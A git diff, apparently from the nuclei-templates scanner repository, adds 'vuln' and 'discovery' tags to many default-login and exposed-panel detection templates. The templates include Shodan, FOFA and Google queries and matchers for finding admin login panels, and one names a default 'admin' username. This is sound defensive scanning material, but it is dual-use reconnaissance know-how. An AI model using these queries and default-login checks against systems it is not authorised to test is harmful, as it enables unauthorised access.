shodan-query: title:"Zebra" - tags: zebra,default-login,misconfig,printer + tags: zebra,default-login,misconfig,printer,vuln http: - raw: diff --git a/http/default-logins/zmanda/zmanda-default-login.yaml b/http/default-logins/zmanda/zmanda-default-login.yaml index 57efe8caf37..df2fe1e3cb1 100644 --- a/http/default-logins/zmanda/zmanda-default-login.yaml +++ b/http/default-logins/zmanda/zmanda-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: zmanda,default-login + tags: zmanda,default-login,vuln http: - raw: diff --git a/http/default-logins/zoho/app-manager-default-login.yaml b/http/default-logins/zoho/app-manager-default-login.yaml index d85cfa0bd68..7f2d77eb829 100644 --- a/http/default-logins/zoho/app-manager-default-login.yaml +++ b/http/default-logins/zoho/app-manager-default-login.yaml @@ -12,7 +12,7 @@ info: shodan-query: title:"Applications Manager Login Screen" verified: true max-request: 1 - tags: default-login,manageengine,zoho + tags: default-login,manageengine,zoho,vuln variables: username: "admin" diff --git a/http/exposed-panels/1password-scim-panel.yaml b/http/exposed-panels/1password-scim-panel.yaml index fc6d9493f51..1c9373cc882 100644 --- a/http/exposed-panels/1password-scim-panel.yaml +++ b/http/exposed-panels/1password-scim-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"1Password SCIM Bridge Login" - tags: panel,1password,login,detect + tags: panel,1password,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/3cx-phone-management-panel.yaml b/http/exposed-panels/3cx-phone-management-panel.yaml index 00e95d82c6b..b0d6aa58f83 100644 --- a/http/exposed-panels/3cx-phone-management-panel.yaml +++ b/http/exposed-panels/3cx-phone-management-panel.yaml @@ -30,7 +30,7 @@ info: - icon_hash=970132176 - title="3cx phone system management console" - title="3cx webclient" - tags: panel,3cx + tags: panel,3cx,discovery http: - method: GET diff --git a/http/exposed-panels/3cx-phone-webclient-management-panel.yaml b/http/exposed-panels/3cx-phone-webclient-management-panel.yaml index f16f01ed3cf..2ef834bfefc 100644 --- a/http/exposed-panels/3cx-phone-webclient-management-panel.yaml +++ b/http/exposed-panels/3cx-phone-webclient-management-panel.yaml @@ -30,7 +30,7 @@ info: - icon_hash=970132176 - title="3cx phone system management console" - title="3cx webclient" - tags: panel,3cx + tags: panel,3cx,discovery http: - method: GET diff --git a/http/exposed-panels/3g-wireless-gateway.yaml b/http/exposed-panels/3g-wireless-gateway.yaml index b14f8215d9b..3c9bbf525ab 100644 --- a/http/exposed-panels/3g-wireless-gateway.yaml +++ b/http/exposed-panels/3g-wireless-gateway.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,router,edb + tags: panel,router,edb,discovery http: - method: GET diff --git a/http/exposed-panels/acemanager-login.yaml b/http/exposed-panels/acemanager-login.yaml index 493259a6b61..1ac66b2a9b6 100644 --- a/http/exposed-panels/acemanager-login.yaml +++ b/http/exposed-panels/acemanager-login.yaml @@ -15,7 +15,7 @@ info: fofa-query: - app="ACEmanager" - app="acemanager" - tags: panel,login,tech,acemanager,sierrawireless + tags: panel,login,tech,acemanager,sierrawireless,discovery http: - method: GET diff --git a/http/exposed-panels/acenet-panel.yaml b/http/exposed-panels/acenet-panel.yaml index 7c17ffc8101..c09608d6adb 100644 --- a/http/exposed-panels/acenet-panel.yaml +++ b/http/exposed-panels/acenet-panel.yaml @@ -8,7 +8,7 @@ info: max-request: 1 shodan-query: http.favicon.hash:-1595726841 fofa-query: body="Login @ Reporter" - tags: panel,login,acenet,acereporter + tags: panel,login,acenet,acereporter,discovery http: - method: GET diff --git a/http/exposed-panels/achecker-panel.yaml b/http/exposed-panels/achecker-panel.yaml index f343b3a4bd5..22e94b9db20 100644 --- a/http/exposed-panels/achecker-panel.yaml +++ b/http/exposed-panels/achecker-panel.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,achecker + tags: panel,achecker,discovery http: - method: GET diff --git a/http/exposed-panels/ackee-panel.yaml b/http/exposed-panels/ackee-panel.yaml index 9d03ed4569e..ad40b5e06bf 100644 --- a/http/exposed-panels/ackee-panel.yaml +++ b/http/exposed-panels/ackee-panel.yaml @@ -1,5 +1,5 @@ -id: ackee-panel - +id: ackee-panel + info: name: Ackee Panel - Detect author: userdehghani @@ -13,19 +13,19 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:-1495233116 - tags: panel,ackee,login,detect + tags: panel,ackee,login,detect,discovery -http: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/favicon.ico" - - stop-at-first-match: true - matchers: - - type: dsl - dsl: - - 'status_code==200 && contains(tolower(body), "<title>ackee")' - - "status_code==200 && (\"-1495233116\" == mmh3(base64_py(body)))" +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/favicon.ico" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code==200 && contains(tolower(body), "<title>ackee")' + - "status_code==200 && (\"-1495233116\" == mmh3(base64_py(body)))" condition: or # digest: 4a0a00473045022100e10e260c4dc21c4cb1ed5142df0224c0cad46fe95744d6a8a6566d7881d9b27e022061577da43dbd9c0c95d42b25766dabd31b41a1cf39c3c4bf54aaed352ad20692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/acrolinx-dashboard.yaml b/http/exposed-panels/acrolinx-dashboard.yaml index 9cd20fb68c9..2c8de69f02f 100644 --- a/http/exposed-panels/acrolinx-dashboard.yaml +++ b/http/exposed-panels/acrolinx-dashboard.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.title:"Acrolinx Dashboard" fofa-query: title=="Acrolinx Dashboard" google-query: inurl:"Acrolinx Dashboard" - tags: acrolinx,panel + tags: acrolinx,panel,discovery http: - method: GET diff --git a/http/exposed-panels/acti-panel.yaml b/http/exposed-panels/acti-panel.yaml index 3ded16f0a1c..df43415611a 100644 --- a/http/exposed-panels/acti-panel.yaml +++ b/http/exposed-panels/acti-panel.yaml @@ -13,7 +13,7 @@ info: product: camera_firmware shodan-query: title:"Web Configurator" html:"ACTi" fofa-query: app="ACTi-视频监控" - tags: acti,panel,login,detect + tags: acti,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/actifio-panel.yaml b/http/exposed-panels/actifio-panel.yaml index aa6e751ec0d..7e0623e176d 100644 --- a/http/exposed-panels/actifio-panel.yaml +++ b/http/exposed-panels/actifio-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Actifio Resource Center" - tags: panel,actifio,login,detect + tags: panel,actifio,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/active-admin-exposure.yaml b/http/exposed-panels/active-admin-exposure.yaml index 1f33a218703..3e5c5b9b2a5 100644 --- a/http/exposed-panels/active-admin-exposure.yaml +++ b/http/exposed-panels/active-admin-exposure.yaml @@ -14,7 +14,7 @@ info: max-request: 1 vendor: activeadmin product: activeadmin - tags: panel,activeadmin + tags: panel,activeadmin,discovery http: - method: GET diff --git a/http/exposed-panels/activemq-panel.yaml b/http/exposed-panels/activemq-panel.yaml index 5732df0ad7b..736a5b8f44c 100644 --- a/http/exposed-panels/activemq-panel.yaml +++ b/http/exposed-panels/activemq-panel.yaml @@ -19,7 +19,7 @@ info: - cpe:"cpe:2.3:a:apache:activemq" - product:"activemq openwire transport" - http.title:"Apache ActiveMQ" - tags: panel,activemq,apache,login + tags: panel,activemq,apache,login,discovery http: - method: GET diff --git a/http/exposed-panels/acunetix-login.yaml b/http/exposed-panels/acunetix-login.yaml index d2af74e9922..72e0a6a2acd 100644 --- a/http/exposed-panels/acunetix-login.yaml +++ b/http/exposed-panels/acunetix-login.yaml @@ -15,7 +15,7 @@ info: shodan-query: title:"Acunetix" product: web_vulnerability_scanner vendor: acunetix - tags: panel,acunetix + tags: panel,acunetix,discovery http: - method: GET diff --git a/http/exposed-panels/acunetix-panel.yaml b/http/exposed-panels/acunetix-panel.yaml index 4a8d777a294..05948e95931 100644 --- a/http/exposed-panels/acunetix-panel.yaml +++ b/http/exposed-panels/acunetix-panel.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel + tags: panel,discovery http: - method: GET diff --git a/http/exposed-panels/adapt-panel.yaml b/http/exposed-panels/adapt-panel.yaml index 0699af0641e..6e817a7aa56 100644 --- a/http/exposed-panels/adapt-panel.yaml +++ b/http/exposed-panels/adapt-panel.yaml @@ -12,7 +12,7 @@ info: max-request: 1 shodan-query: http.title:"Adapt authoring tool" verified: true - tags: panel,adapt,login,detect + tags: panel,adapt,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/addonfinance-portal.yaml b/http/exposed-panels/addonfinance-portal.yaml index 061ae3d8661..f3467462fd5 100644 --- a/http/exposed-panels/addonfinance-portal.yaml +++ b/http/exposed-panels/addonfinance-portal.yaml @@ -9,7 +9,7 @@ info: verified: "true" max-request: 1 shodan-query: title:"AddOnFinancePortal" - tags: panel,addon,finance,detect + tags: panel,addon,finance,detect,discovery http: - method: GET diff --git a/http/exposed-panels/adfinity-panel.yaml b/http/exposed-panels/adfinity-panel.yaml index ddfcbee684e..158a971709a 100644 --- a/http/exposed-panels/adfinity-panel.yaml +++ b/http/exposed-panels/adfinity-panel.yaml @@ -1,35 +1,35 @@ -id: adfinity-panel - -info: - name: Adfinity Login Panel - Detect - author: righettod - severity: info - description: | - Adfinity products was detected. - reference: - - https://easi.net/en/solutions/adfinity - metadata: - max-request: 1 - verified: true - shodan-query: http.html:"Adfinity" - tags: panel,adfinity,login - -http: - - method: GET - path: - - "{{BaseURL}}/adfinity/login" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "adfinity web application", "adfinity web access", "csrf_adfinity_token")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: +id: adfinity-panel + +info: + name: Adfinity Login Panel - Detect + author: righettod + severity: info + description: | + Adfinity products was detected. + reference: + - https://easi.net/en/solutions/adfinity + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"Adfinity" + tags: panel,adfinity,login,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/adfinity/login" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "adfinity web application", "adfinity web access", "csrf_adfinity_token")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - '(?i)Version\s+Adfinity([0-9.]+)' # digest: 490a0046304402206f0b8ba1dc2ff9400ff47a057d88584111e42ff2db9d5b017e8a3e6ca7ee58730220753846ee65bdd71fd9a5ad5672316d08fd8da40297bca7bf3225a9c4db900731:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adguard-panel.yaml b/http/exposed-panels/adguard-panel.yaml index 58cf7714d7a..e66ebcb3f73 100644 --- a/http/exposed-panels/adguard-panel.yaml +++ b/http/exposed-panels/adguard-panel.yaml @@ -14,7 +14,7 @@ info: vendor: adguard product: adguard fofa-query: title="AdGuard Home" - tags: adguard,panel,login,detect + tags: adguard,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/adhoc-transfer-panel.yaml b/http/exposed-panels/adhoc-transfer-panel.yaml index 0a039c5d1c4..82fd0d5ddf9 100644 --- a/http/exposed-panels/adhoc-transfer-panel.yaml +++ b/http/exposed-panels/adhoc-transfer-panel.yaml @@ -22,7 +22,7 @@ info: - intitle:"ws_ftp server web transfer" - intitle:"ad hoc transfer" censys-query: services.http.request.uri="*/thinclient/wtm/public/index.html" - tags: panel,wsftp,ad-hoc,detect,login,progress + tags: panel,wsftp,ad-hoc,detect,login,progress,discovery http: - method: GET diff --git a/http/exposed-panels/adiscon-loganalyzer.yaml b/http/exposed-panels/adiscon-loganalyzer.yaml index e5406b6a292..feda9850f4c 100644 --- a/http/exposed-panels/adiscon-loganalyzer.yaml +++ b/http/exposed-panels/adiscon-loganalyzer.yaml @@ -16,7 +16,7 @@ info: max-request: 1 vendor: adiscon product: loganalyzer - tags: adiscon,loganalyzer,syslog,exposure,panel + tags: adiscon,loganalyzer,syslog,exposure,panel,discovery http: - method: GET diff --git a/http/exposed-panels/adminer-panel-detect.yaml b/http/exposed-panels/adminer-panel-detect.yaml index e7b811c4db3..cfaee7388fb 100644 --- a/http/exposed-panels/adminer-panel-detect.yaml +++ b/http/exposed-panels/adminer-panel-detect.yaml @@ -23,7 +23,7 @@ info: - app="adminer" && body="4.7.8" hunter-query: app.name="adminer"&&web.body="4.7.8" google-query: intitle:"login - adminer" - tags: panel,fuzz,adminer,login,sqli + tags: panel,fuzz,adminer,login,sqli,discovery http: - raw: diff --git a/http/exposed-panels/adminer-panel.yaml b/http/exposed-panels/adminer-panel.yaml index 74fc7bf86a0..3a1124eae13 100644 --- a/http/exposed-panels/adminer-panel.yaml +++ b/http/exposed-panels/adminer-panel.yaml @@ -24,7 +24,7 @@ info: - app="adminer" && body="4.7.8" hunter-query: app.name="adminer"&&web.body="4.7.8" google-query: intitle:"login - adminer" - tags: panel,adminer + tags: panel,adminer,discovery http: - method: GET diff --git a/http/exposed-panels/adminset-panel.yaml b/http/exposed-panels/adminset-panel.yaml index 84ed5232178..aa14109d5fe 100644 --- a/http/exposed-panels/adminset-panel.yaml +++ b/http/exposed-panels/adminset-panel.yaml @@ -12,7 +12,7 @@ info: fofa-query: app="AdminSet" reference: - https://github.com/guhongze/adminset/ - tags: adminset,panel + tags: adminset,panel,discovery http: - method: GET diff --git a/http/exposed-panels/adobe/adobe-component-login.yaml b/http/exposed-panels/adobe/adobe-component-login.yaml index 809721d019a..3bc0651b277 100644 --- a/http/exposed-panels/adobe/adobe-component-login.yaml +++ b/http/exposed-panels/adobe/adobe-component-login.yaml @@ -23,7 +23,7 @@ info: - app="adobe-coldfusion" - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" - tags: panel,adobe,coldfusion,edb + tags: panel,adobe,coldfusion,edb,discovery http: - method: GET diff --git a/http/exposed-panels/adobe/adobe-connect-central-login.yaml b/http/exposed-panels/adobe/adobe-connect-central-login.yaml index 08d2f24861c..d6fef2ef012 100644 --- a/http/exposed-panels/adobe/adobe-connect-central-login.yaml +++ b/http/exposed-panels/adobe/adobe-connect-central-login.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.title:"openvpn connect" fofa-query: title="openvpn connect" google-query: intitle:"openvpn connect" - tags: adobe,panel,connect-central + tags: adobe,panel,connect-central,discovery http: - method: GET diff --git a/http/exposed-panels/adobe/adobe-experience-manager-login.yaml b/http/exposed-panels/adobe/adobe-experience-manager-login.yaml index c67be4c0f56..1c0978c7628 100644 --- a/http/exposed-panels/adobe/adobe-experience-manager-login.yaml +++ b/http/exposed-panels/adobe/adobe-experience-manager-login.yaml @@ -21,7 +21,7 @@ info: - cpe:"cpe:2.3:a:adobe:experience_manager" fofa-query: title="aem sign in" google-query: intitle:"aem sign in" - tags: panel,aem,adobe + tags: panel,aem,adobe,discovery http: - method: GET diff --git a/http/exposed-panels/adobe/adobe-media-server.yaml b/http/exposed-panels/adobe/adobe-media-server.yaml index 3e62300ea71..4421480fe2c 100644 --- a/http/exposed-panels/adobe/adobe-media-server.yaml +++ b/http/exposed-panels/adobe/adobe-media-server.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Adobe Media Server" - tags: panel,adobe + tags: panel,adobe,discovery http: - method: GET diff --git a/http/exposed-panels/adobe/aem-crx-package-manager.yaml b/http/exposed-panels/adobe/aem-crx-package-manager.yaml index 6de3390aa9f..a24eb5bc655 100644 --- a/http/exposed-panels/adobe/aem-crx-package-manager.yaml +++ b/http/exposed-panels/adobe/aem-crx-package-manager.yaml @@ -23,7 +23,7 @@ info: - cpe:"cpe:2.3:a:adobe:experience_manager" fofa-query: title="aem sign in" google-query: intitle:"aem sign in" - tags: panel,aem,adobe + tags: panel,aem,adobe,discovery http: - method: GET diff --git a/http/exposed-panels/adobe/aem-forms-panel.yaml b/http/exposed-panels/adobe/aem-forms-panel.yaml index d2567e6d4c6..0715d76fa50 100644 --- a/http/exposed-panels/adobe/aem-forms-panel.yaml +++ b/http/exposed-panels/adobe/aem-forms-panel.yaml @@ -11,7 +11,7 @@ info: max-request: 1 vendor: adobe product: experience_manager_forms - tags: panel,login,adobe,detect + tags: panel,login,adobe,detect,discovery http: - method: GET diff --git a/http/exposed-panels/adobe/aem-sling-login.yaml b/http/exposed-panels/adobe/aem-sling-login.yaml index 1de285ffe4a..9e233f7294a 100644 --- a/http/exposed-panels/adobe/aem-sling-login.yaml +++ b/http/exposed-panels/adobe/aem-sling-login.yaml @@ -23,7 +23,7 @@ info: - cpe:"cpe:2.3:a:adobe:experience_manager" fofa-query: title="aem sign in" google-query: intitle:"aem sign in" - tags: panel,aem,adobe,sling + tags: panel,aem,adobe,sling,discovery http: - method: GET diff --git a/http/exposed-panels/advance-setup.yaml b/http/exposed-panels/advance-setup.yaml index 500e59228e7..b65601dce96 100644 --- a/http/exposed-panels/advance-setup.yaml +++ b/http/exposed-panels/advance-setup.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,setup,edb + tags: panel,setup,edb,discovery http: - method: GET diff --git a/http/exposed-panels/aerohive-netconfig-ui.yaml b/http/exposed-panels/aerohive-netconfig-ui.yaml index d69e178bc3d..23ba08c134b 100644 --- a/http/exposed-panels/aerohive-netconfig-ui.yaml +++ b/http/exposed-panels/aerohive-netconfig-ui.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"Aerohive NetConfig UI" product: aerohive_netconfig vendor: extremenetworks - tags: panel,tech,hiveos,aerohive + tags: panel,tech,hiveos,aerohive,discovery http: - method: GET diff --git a/http/exposed-panels/aethra-panel.yaml b/http/exposed-panels/aethra-panel.yaml index 4da3ca5a460..680d8620bc4 100644 --- a/http/exposed-panels/aethra-panel.yaml +++ b/http/exposed-panels/aethra-panel.yaml @@ -12,7 +12,7 @@ info: max-request: 1 shodan-query: http.title:"Aethra Telecommunications Operating System" verified: true - tags: panel,aethra,login,detect + tags: panel,aethra,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/afterlogic-webmail-login.yaml b/http/exposed-panels/afterlogic-webmail-login.yaml index 807d3d64ced..321ed7e357a 100644 --- a/http/exposed-panels/afterlogic-webmail-login.yaml +++ b/http/exposed-panels/afterlogic-webmail-login.yaml @@ -14,7 +14,7 @@ info: max-request: 1 product: aurora vendor: afterlogic - tags: panel,afterlogic,login,detect + tags: panel,afterlogic,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/aircube-dashboard-panel.yaml b/http/exposed-panels/aircube-dashboard-panel.yaml index bbccc234a0c..9efd574e7f9 100644 --- a/http/exposed-panels/aircube-dashboard-panel.yaml +++ b/http/exposed-panels/aircube-dashboard-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"AirCube Dashboard" product: aircube vendor: ui - tags: panel,aircube + tags: panel,aircube,discovery http: - method: GET diff --git a/http/exposed-panels/aircube-login.yaml b/http/exposed-panels/aircube-login.yaml index 82a4e659993..83d260f2af7 100644 --- a/http/exposed-panels/aircube-login.yaml +++ b/http/exposed-panels/aircube-login.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.favicon.hash:1249285083 product: aircube vendor: ui - tags: panel,aircube,ubiquiti + tags: panel,aircube,ubiquiti,discovery http: - method: GET diff --git a/http/exposed-panels/airflow-panel.yaml b/http/exposed-panels/airflow-panel.yaml index 56b141c1109..30a94b8596c 100644 --- a/http/exposed-panels/airflow-panel.yaml +++ b/http/exposed-panels/airflow-panel.yaml @@ -27,7 +27,7 @@ info: google-query: - intitle:"airflow - dags" || http.html:"apache airflow" - intitle:"sign in - airflow" - tags: panel,apache,airflow,admin + tags: panel,apache,airflow,admin,discovery http: - method: GET diff --git a/http/exposed-panels/airnotifier-panel.yaml b/http/exposed-panels/airnotifier-panel.yaml index 195c4b05b3b..0051e3567f3 100644 --- a/http/exposed-panels/airnotifier-panel.yaml +++ b/http/exposed-panels/airnotifier-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"AirNotifier" - tags: panel,airnotifier + tags: panel,airnotifier,discovery http: - method: GET diff --git a/http/exposed-panels/airos-panel.yaml b/http/exposed-panels/airos-panel.yaml index 60a3977b641..3efc5c8510e 100644 --- a/http/exposed-panels/airos-panel.yaml +++ b/http/exposed-panels/airos-panel.yaml @@ -14,7 +14,7 @@ info: vendor: ui product: airos shodan-query: "http.favicon.hash:-697231354" - tags: airos,panel + tags: airos,panel,discovery http: - method: GET diff --git a/http/exposed-panels/akamai-cloudtest.yaml b/http/exposed-panels/akamai-cloudtest.yaml index e9f95cac7fe..f639ed061d9 100644 --- a/http/exposed-panels/akamai-cloudtest.yaml +++ b/http/exposed-panels/akamai-cloudtest.yaml @@ -14,7 +14,7 @@ info: max-request: 1 vendor: akamai product: cloudtest - tags: panel,akamai + tags: panel,akamai,discovery http: - method: GET diff --git a/http/exposed-panels/akhq-panel.yaml b/http/exposed-panels/akhq-panel.yaml index 95a72564dd5..2161c05c6d8 100644 --- a/http/exposed-panels/akhq-panel.yaml +++ b/http/exposed-panels/akhq-panel.yaml @@ -11,7 +11,7 @@ info: max-request: 1 shodan-query: http.favicon.hash:855432563 fofa-query: body="AKHQ_PREFIX_UI" - tags: akhq,panel,login,detect + tags: akhq,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/akuiteo-panel.yaml b/http/exposed-panels/akuiteo-panel.yaml index 5f402907738..986bf3fa7d8 100644 --- a/http/exposed-panels/akuiteo-panel.yaml +++ b/http/exposed-panels/akuiteo-panel.yaml @@ -1,40 +1,40 @@ -id: akuiteo-panel - -info: - name: Akuiteo Login Panel - Detect - author: righettod - severity: info - description: | - Akuiteo products was detected. - reference: - - https://www.akuiteo.com/en/ - metadata: - verified: true - max-request: 1 - shodan-query: title:"Akuiteo" - tags: panel,akuiteo,login,detect - -http: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/akuiteo.collabs/login/login.html" - - "{{BaseURL}}/akuiteo/login.html/" - - redirects: true - max-redirects: 2 - - stop-at-first-match: true - matchers: - - type: dsl - dsl: - - 'contains_any(to_lower(body), "akuiteo collabs", "akuiteo mobile", "akuiteo", "[akuiteo]")' - condition: and - - extractors: - - type: regex - part: header - group: 1 - regex: +id: akuiteo-panel + +info: + name: Akuiteo Login Panel - Detect + author: righettod + severity: info + description: | + Akuiteo products was detected. + reference: + - https://www.akuiteo.com/en/ + metadata: + verified: true + max-request: 1 + shodan-query: title:"Akuiteo" + tags: panel,akuiteo,login,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/akuiteo.collabs/login/login.html" + - "{{BaseURL}}/akuiteo/login.html/" + + redirects: true + max-redirects: 2 + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'contains_any(to_lower(body), "akuiteo collabs", "akuiteo mobile", "akuiteo", "[akuiteo]")' + condition: and + + extractors: + - type: regex + part: header + group: 1 + regex: - '(?i)x-akuiteo-masterhash:\s+([0-9a-f]+)' # digest: 4b0a00483046022100ca83fd7da21c9c8b98e8ce570f544d18204dff0e528cae6d50906094a6b3bcba022100c73fc95e6468f2d95767a96fdc8221e2e13d0eb00217df9bcefb539b88c50df1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/alamos-panel.yaml b/http/exposed-panels/alamos-panel.yaml index 3baf8d914c5..d69d0cce4cf 100644 --- a/http/exposed-panels/alamos-panel.yaml +++ b/http/exposed-panels/alamos-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Alamos GmbH | FE2" - tags: panel,alamos,login,detect + tags: panel,alamos,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/alfresco-detect.yaml b/http/exposed-panels/alfresco-detect.yaml index ae9d2e7e024..1700b1c4d29 100644 --- a/http/exposed-panels/alfresco-detect.yaml +++ b/http/exposed-panels/alfresco-detect.yaml @@ -14,7 +14,7 @@ info: max-request: 1 vendor: alfresco product: alfresco - tags: alfresco,tech,panel + tags: alfresco,tech,panel,discovery http: - method: GET diff --git a/http/exposed-panels/alfresco-panel.yaml b/http/exposed-panels/alfresco-panel.yaml index e63caccc5ec..45ef654df8d 100644 --- a/http/exposed-panels/alfresco-panel.yaml +++ b/http/exposed-panels/alfresco-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Alfresco Content App" - tags: panel,alfresco,login,detect + tags: panel,alfresco,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/algonomia-panel.yaml b/http/exposed-panels/algonomia-panel.yaml index 59b1d614c6a..7a19541e179 100644 --- a/http/exposed-panels/algonomia-panel.yaml +++ b/http/exposed-panels/algonomia-panel.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: tech,algonomia,detect,panel + tags: tech,algonomia,detect,panel,discovery http: - method: GET diff --git a/http/exposed-panels/alienvault-usm.yaml b/http/exposed-panels/alienvault-usm.yaml index 067fe4a3f2e..ab5d8e0e297 100644 --- a/http/exposed-panels/alienvault-usm.yaml +++ b/http/exposed-panels/alienvault-usm.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"AlienVault USM" - tags: panel,alienvault + tags: panel,alienvault,discovery http: - method: GET diff --git a/http/exposed-panels/allegro-rompager-panel.yaml b/http/exposed-panels/allegro-rompager-panel.yaml index 553749f18dc..79301f4b69b 100644 --- a/http/exposed-panels/allegro-rompager-panel.yaml +++ b/http/exposed-panels/allegro-rompager-panel.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true shodan-query: product:"Allegro RomPager" - tags: tech,allegro,rompager,panel,login + tags: tech,allegro,rompager,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/allied-telesis-exposure.yaml b/http/exposed-panels/allied-telesis-exposure.yaml index 95ecefb8247..e08b154685c 100644 --- a/http/exposed-panels/allied-telesis-exposure.yaml +++ b/http/exposed-panels/allied-telesis-exposure.yaml @@ -20,7 +20,7 @@ info: - http.title:"allied telesis device gui" fofa-query: title="allied telesis device gui" google-query: intitle:"allied telesis device gui" - tags: panel,allied,allied_telesis + tags: panel,allied,allied_telesis,discovery http: - method: GET diff --git a/http/exposed-panels/alternc-panel.yaml b/http/exposed-panels/alternc-panel.yaml index 82e3d2853fa..eda8b0e4bcd 100644 --- a/http/exposed-panels/alternc-panel.yaml +++ b/http/exposed-panels/alternc-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"AlternC Desktop" - tags: panel,alternc,login,detect + tags: panel,alternc,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/ambari-exposure.yaml b/http/exposed-panels/ambari-exposure.yaml index 2853a8101f0..e3b53f80bfc 100644 --- a/http/exposed-panels/ambari-exposure.yaml +++ b/http/exposed-panels/ambari-exposure.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: apache product: ambari - tags: panel,apache,ambari,exposure + tags: panel,apache,ambari,exposure,discovery http: - method: GET diff --git a/http/exposed-panels/amcrest-login.yaml b/http/exposed-panels/amcrest-login.yaml index aa01a74da46..af851642aa2 100644 --- a/http/exposed-panels/amcrest-login.yaml +++ b/http/exposed-panels/amcrest-login.yaml @@ -24,7 +24,7 @@ info: fofa-query: - body="amcrest" "ldap user" - body="amcrest" - tags: panel,camera,amcrest,edb + tags: panel,camera,amcrest,edb,discovery http: - method: GET diff --git a/http/exposed-panels/ametys-admin-login.yaml b/http/exposed-panels/ametys-admin-login.yaml index 96733e611b7..b673d85d4d4 100644 --- a/http/exposed-panels/ametys-admin-login.yaml +++ b/http/exposed-panels/ametys-admin-login.yaml @@ -12,7 +12,7 @@ info: max-request: 1 vendor: ametys product: ametys - tags: panel,ametys,cms + tags: panel,ametys,cms,discovery http: - method: GET diff --git a/http/exposed-panels/amp-application-panel.yaml b/http/exposed-panels/amp-application-panel.yaml index 7a6502be8ae..db86fd97dec 100644 --- a/http/exposed-panels/amp-application-panel.yaml +++ b/http/exposed-panels/amp-application-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"amp - application management panel" fofa-query: title="amp - application management panel" google-query: intitle:"amp - application management panel" - tags: panel,amp,cubecoders + tags: panel,amp,cubecoders,discovery http: - method: GET diff --git a/http/exposed-panels/ampache-panel.yaml b/http/exposed-panels/ampache-panel.yaml index 0fa83421721..fe97786e1f3 100644 --- a/http/exposed-panels/ampache-panel.yaml +++ b/http/exposed-panels/ampache-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"for the love of music" fofa-query: title="for the love of music" google-query: intitle:"for the love of music" - tags: panel,ampache + tags: panel,ampache,discovery http: - method: GET diff --git a/http/exposed-panels/ampps-admin-panel.yaml b/http/exposed-panels/ampps-admin-panel.yaml index 963cdb2b98a..5c1e10a8409 100644 --- a/http/exposed-panels/ampps-admin-panel.yaml +++ b/http/exposed-panels/ampps-admin-panel.yaml @@ -9,7 +9,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,ampps,login + tags: panel,ampps,login,discovery http: - method: GET diff --git a/http/exposed-panels/ampps-panel.yaml b/http/exposed-panels/ampps-panel.yaml index fb422e4e5aa..301516e1713 100644 --- a/http/exposed-panels/ampps-panel.yaml +++ b/http/exposed-panels/ampps-panel.yaml @@ -9,7 +9,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,ampps,login + tags: panel,ampps,login,discovery http: - method: GET diff --git a/http/exposed-panels/amprion-gridloss-panel.yaml b/http/exposed-panels/amprion-gridloss-panel.yaml index 95f692c3fc3..2df8444bf0d 100644 --- 